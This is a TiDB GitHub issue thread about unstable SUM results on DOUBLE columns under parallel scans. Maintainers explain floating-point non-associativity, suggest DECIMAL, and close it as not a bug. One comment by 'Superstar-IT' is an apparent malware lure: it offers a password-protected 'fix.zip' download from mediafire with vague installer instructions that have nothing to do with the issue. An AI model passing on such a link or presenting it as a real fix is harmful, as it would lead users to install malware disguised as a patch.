### ISSUE TITLE
Unstable double results returned by sum agg when using default value of tidb_distsql_scan_concurrency 

### ISSUE THREAD

**Issue by pcqz** [pingcap/tidb#55710]
## Bug Report

Please answer these questions before submitting your issue. Thanks!

### 1. Minimal reproduce step (Required)

create table test(a double);
insert into test values(12345678.12345678);
insert into test select a from test; -- repeat multiple times
split table test between (1) and (16384) regions 10;
split table test between (1) and (16384) regions 11; -- split table unevenly
select sum(a) from test;

### 2. What did you expect to see? (Required)

The same result is returned.

### 3. What did you see instead (Required)

The results are unstable, like this:
```
+--------------------+
| sum(a)             |
+--------------------+
| 202271590374.71768 |
+--------------------+
+-------------------+
| sum(a)            |
+-------------------+
| 202271590374.7177 |
+-------------------+
+--------------------+
| sum(a)             |
+--------------------+
| 202271590374.71774 |
+--------------------+
```

If tidb_distsql_scan_concurrency is set to 1, then get the stable and same result:
```
+-------------------+
| sum(a)            |
+-------------------+
| 202271590374.7177 |
+-------------------+
```
### 4. What is your TiDB version? (Required)

v4.0 and above

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by XuHuaiyu** [comment]
In a distributed system, slight variations in floating-point arithmetic results can occur due to differences in how data is partitioned and processed across multiple nodes. These discrepancies arise because floating-point addition is not associative, meaning `(a + b) + c != a + (b + c)`, so the order of operations can affect the final result. 
When parallel processing is involved, the system may combine partial results from different nodes in varying orders, leading to small inconsistencies in the final sum. Setting the concurrency level to 1 forces a consistent order of operations, resulting in stable outputs. This behavior is typical in distributed environments where floating-point precision is involved.

**Comment by XuHuaiyu** [comment]
If you want to obtain stable results in a distributed environment, it is recommended to use the fixed-point data type DECIMAL for calculations.

**Comment by XuHuaiyu** [comment]
not a bug
